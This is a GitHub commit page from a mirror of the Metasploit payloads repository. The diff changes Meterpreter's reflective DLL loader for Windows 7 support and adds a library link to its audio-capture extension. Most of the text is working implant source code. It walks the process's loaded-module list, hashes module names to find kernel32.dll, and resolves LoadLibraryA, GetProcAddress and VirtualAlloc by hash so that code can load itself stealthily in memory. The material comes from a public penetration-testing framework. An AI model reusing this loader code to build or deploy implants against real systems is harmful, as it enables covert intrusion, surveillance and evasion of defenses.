github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-04-24 10:09:49 +02:00
Code Releases Activity

Merge Stephen Fewer's patches to enable support for Windows 7 (fixes support for NT and 2000 as well)

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@6744 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2009-07-05 20:24:37 +00:00
parent 96bc1ea168
commit 1da709b2d9
3 changed files with 58 additions and 7 deletions
c/meterpreter/source
ReflectiveDLLInjection
ReflectiveLoader.cReflectiveLoader.h
extensions/espia
audio.c

39
c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c

@ -40,7 +40,7 @@ DLLEXPORT DWORD WINAPI ReflectiveLoader( VOID )
LOADLIBRARYA pLoadLibraryA; LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress; GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc; VIRTUALALLOC pVirtualAlloc;
BYTE bCounter = 3; BYTE bCounter;
// the initial location of this image in memory // the initial location of this image in memory
DWORD dwLibraryAddress; DWORD dwLibraryAddress;
@ -89,10 +89,35 @@ DLLEXPORT DWORD WINAPI ReflectiveLoader( VOID )
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
dwBaseAddress = (DWORD)((_PPEB)dwBaseAddress)->pLdr; dwBaseAddress = (DWORD)((_PPEB)dwBaseAddress)->pLdr;
dwBaseAddress = DEREF_32( ((PPEB_LDR_DATA)dwBaseAddress)->InInitializationOrderModuleList.Flink ); // get the first entry of the InMemoryOrder module list
dwValueA = (DWORD)((PPEB_LDR_DATA)dwBaseAddress)->InMemoryOrderModuleList.Flink;
// get this kernels base address while( dwValueA )
dwBaseAddress = DEREF_32( dwBaseAddress + 8 ); {
// get pointer to current modules name (unicode string)
dwValueB = (DWORD)((PLDR_MODULE_MEMORY_ORDER)dwValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
bCounter = (BYTE)((PLDR_MODULE_MEMORY_ORDER)dwValueA)->BaseDllName.Length;
// clear dwValueC which will store the hash of the module name
dwValueC = 0;
// compute the hash of the module name...
do
{
__asm ror dwValueC, HASH_KEY
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)dwValueB) >= 'a' )
dwValueC += *((BYTE *)dwValueB) - 0x20;
else
dwValueC += *((BYTE *)dwValueB);
dwValueB++;
} while( --bCounter );
// get this modules base address
dwBaseAddress = (DWORD)((PLDR_MODULE_MEMORY_ORDER)dwValueA)->BaseAddress;
// compare the hash with that of kernel32.dll
if( dwValueC == KERNEL32DLL_HASH )
break;
// get the next entry
dwValueA = DEREF_32( dwValueA );
}
// get the VA of the modules NT Header // get the VA of the modules NT Header
dwExportDir = dwBaseAddress + ((PIMAGE_DOS_HEADER)dwBaseAddress)->e_lfanew; dwExportDir = dwBaseAddress + ((PIMAGE_DOS_HEADER)dwBaseAddress)->e_lfanew;
@ -109,6 +134,8 @@ DLLEXPORT DWORD WINAPI ReflectiveLoader( VOID )
// get the VA for the array of name ordinals // get the VA for the array of name ordinals
dwNameOrdinals = ( dwBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )dwExportDir)->AddressOfNameOrdinals ); dwNameOrdinals = ( dwBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )dwExportDir)->AddressOfNameOrdinals );
bCounter = 3;
// loop while we still have imports to find // loop while we still have imports to find
while( bCounter > 0 ) while( bCounter > 0 )
{ {
@ -362,4 +389,4 @@ BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
} }
return bReturnValue; return bReturnValue;
} }
//===============================================================================================// //===============================================================================================//

25
c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h

@ -43,7 +43,7 @@ typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E #define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA #define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54 #define VIRTUALALLOC_HASH 0x91AFCA54
@ -90,6 +90,29 @@ __forceinline VOID __memcpy( DWORD dwDest, DWORD dwSource, DWORD dwLength )
} }
//===============================================================================================// //===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
typedef struct _LDR_MODULE_MEMORY_ORDER
{
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID BaseAddress;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_MODULE_MEMORY_ORDER, *PLDR_MODULE_MEMORY_ORDER;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA // WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{ {

1
c/meterpreter/source/extensions/espia/audio.c

@ -10,6 +10,7 @@
#pragma comment(lib, "vfw32.lib") #pragma comment(lib, "vfw32.lib")
#pragma comment(lib, "winmm.lib")
#define capSendMessage(hWnd, uMsg, wParm, lParam) ((IsWindow(hWnd)) ? SendMessage(hWnd, uMsg, (WPARAM)(wParm), (LPARAM)(lParam)) : 0) #define capSendMessage(hWnd, uMsg, wParm, lParam) ((IsWindow(hWnd)) ? SendMessage(hWnd, uMsg, (WPARAM)(wParm), (LPARAM)(lParam)) : 0)